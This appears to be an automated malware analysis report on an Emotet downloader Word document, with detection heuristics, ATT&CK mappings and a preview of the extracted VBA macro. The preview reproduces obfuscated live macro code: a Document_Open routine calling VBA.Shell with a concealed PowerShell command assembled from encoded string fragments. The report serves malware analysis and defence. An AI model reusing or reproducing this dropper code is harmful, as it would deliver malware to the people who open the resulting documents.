Verdict: MALICIOUS
Risk Score: 222
Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-7349880-0. Static analysis revealed a Document_Open macro that calls the VBA Shell() function with a command assembled from concatenated string fragments. The command is executed on document open, most likely to download and run a second-stage payload, which is common Emotet behaviour.
Heuristics (6)

- ClamAV: Doc.Downloader.Emotet-7349880-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-7349880-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12755 bytes | 347910f87200f340373ba871418a209c158194d40e79fc0d7b5ab5c7f1b3bd8a |

Preview script (first 1,000 lines of the extracted script):
```vb
Attribute VB_Name = "mQYlTssFXIz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function ECQFzWdOfWj()
On Error Resume Next
oiGoYF = 59083 + OEaAfo + (52366 * CDbl(klOwA) - XcfSF / CSng(41707) - qmIWzi / Hex(sEzoaC) + 8926 - 94266)
LPQwvd = Sqr(31438)
TBBMvF = DOBJi
ksnLdI = AJEYS - djJnP / 61528 / ZXzwaB - 223327908 + Hex(DpZtM) * NmHqc - Round(28880)
dWMurl = 54941 + CLjLMw + (8567 * CDbl(ZSLAku) - GzQvsm / CSng(37664) - QNOsra / Hex(zqmGq) + 57212 - 63805)
TiEqKn = Sqr(94942)
soRzji = hjGIf
NilFub = kCicTz - DNQMTU / 27472 / DGZNwM - 223327908 + Hex(wJuSjA) * FUSYB - Round(3649)
iifhid = 94928 + ZiAOz + (87865 * CDbl(vtvTM) - vFMXa / CSng(65181) - WLZqSQ / Hex(apltXE) + 98083 - 67324)
MbYlj = Sqr(57682)
IANpV = rZzUcQ
ZJDMj = TJDvB - NIKvhO / 62996 / IBvHZ - 223327908 + Hex(nzwCw) * sHAjO - Round(7766)
DXuYN = 92568 + WlUNBw + (80725 * CDbl(GIdjdT) - lhLTFJ / CSng(83122) - zQKaIV / Hex(cTSRY) + 31338 - 1465)
odMZP = Sqr(2941)
BVbqcC = VJCjr
zODYl = Nurdf - XwqYh / 41025 / jKNLuO - 223327908 + Hex(TWpskb) * ZQwXkj - Round(98221)
ECQFzWdOfWj = vTEJwtGZPzn + VBA.Shell(AVzGGcXUcD + Chr(nzDAjD + vbKeyP + FoRuXfEEPTI) + "owers" + ErjNHiAdEtp + oAbEjchtH + TmLGnsb + ZasHTVZPfE, 9322 - 9322)
NmCIJ = 2227 + qFwsDj + (96308 * CDbl(uBzluR) - lXBGHB / CSng(47093) - MjGGLd / Hex(OaiEYT) + 55366 - 91007)
bfkDEi = Sqr(34478)
YbotI = RzFfDV
DaAfHD = sSVmMz - mCBmW / 6893 / tSJcMi - 223327908 + Hex(RVfiOi) * ldOHX - Round(77535)
lKIrC = 90146 + SbzqH + (94928 * CDbl(WAZnf) - PdnVSt / CSng(39539) - ijTNSA / Hex(rdlLMw) + 42455 - 70957)
HilYf = Sqr(85315)
Fzqjr = thBRL
OlMzI = nZJaw - sdcowa / 59672 / nbTBt - 223327908 + Hex(iNjHvw) * aEbGBk - Round(39617)
End Function
Private Sub Document_open()
On Error Resume Next
nSKFP = 85537 + pCiAt + (32822 * CDbl(AivqK) - bZhAGz / CSng(99711) - pSzwVG / Hex(JvvUc) + 31686 - 43042)
HBsbFi = Sqr(22150)
MBmBms = ftowAU
IqmsNl = wQsrA - jEYKIr / 74181 / ViRFZ - 223327908 + Hex(zOXuD) * ZpGiND - Round(45853)
mHVnnM = 22276 + swnWKr + (96032 * CDbl(wETBDR) - sjKwCu / CSng(12518) - PFjCwN / Hex(PLZMLl) + 71543 - 99250)
jziUs = Sqr(39143)
wEjZWP = wURznY
pVIdD = NJplBY - iozbV / 79888 / brFNH - 223327908 + Hex(FODPlD) * hrhpkW - Round(72212)
ECQFzWdOfWj
zQvWUY = 97357 + aAwcj + (75762 * CDbl(JrzDJ) - VfitB / CSng(59443) - DMmAi / Hex(tQuOCN) + 99269 - 18756)
akkwmn = Sqr(80005)
QWajNi = uzCwDM
zzDkb = QcStiC - Nztwt / 82132 / cwqJB - 223327908 + Hex(FtJDr) * NBnBiB - Round(34074)
iCIuiC = 61746 + TPBzo + (23181 * CDbl(vOwbK) - qMXouq / CSng(84730) - SCwkn / Hex(ktkTP) + 99289 - 14669)
URXSW = Sqr(75631)
imjTVG = MnqAtw
cDRlor = kFnMoQ - MDNBt / 78781 / ddMLd - 223327908 + Hex(sFRcT) * Oqzhw - Round(97823)
End Sub
Attribute VB_Name = "uIffDLrSHOJ"
Function ErjNHiAdEtp()
On Error Resume Next
fUWBt = Sqr(39882)
tXQRTw = WMdmL - StmujD / 49386 / FsufHv - 223327908 + Hex(OkwDTU) * cSzSKs - Round(3620)
TZpjUF = JiSOj
CuFTd = 68739 + tLtUJS + (23759 * CDbl(RkvzRz) - cjGAz / CSng(78020) - sziOl / Hex(JYfCD) + 72703 - 80220)
IKMJTQjM = "HeLL &" + "( $EnV:CoMspec" + "[4,2" + "4,25]-JOIn'')" + "(-jOI" + "n ( '112D0w61m3" + "9m" + "34j23F1" + "16S105S"
uWUOdI = Sqr(95316)
GBKqj = wJbTB - SrITW / 73090 / lJzza - 223327908 + Hex(VEiqRi) * QKOJn - Round(12524)
YQaIq = ibVqvw
iVlLDU = 14268 + firNTR + (38568 * CDbl(NshrmU) - FzFLjI / CSng(55842) - YVKzz / Hex(HHXup) + 87985 - 65260)
dYZYQHI = "116" + "j58,49m35m1" + "21S59&54D6" + "2{49{" + "55S32{116F38" + "!53S58&" + "48w" + "59j57S111,112" + "w17&6"
tvKjKI = Sqr(18449)
PUbkrk = fcBLG - vciBO / 1714 / XtcEm - 223327908 + Hex(hATuX) * uaEWwC - Round(51322)
vJNTVr = RDOAr
CMEJEk = 89126 + HPSJo + (63577 * CDbl(HcwfQ) - Kbvdb / CSng(66307) - EBUqan / Hex(DGFFD) + 23397 - 38527)
zjLiWiBjjzn = ",32!6,27&50{11" + "6&105{116&58" + "m49S35,121m59{" + "54,62m49F" + "55S32{11" + "6!7" + "S45,39F32,49" + "S5"
```

... (truncated)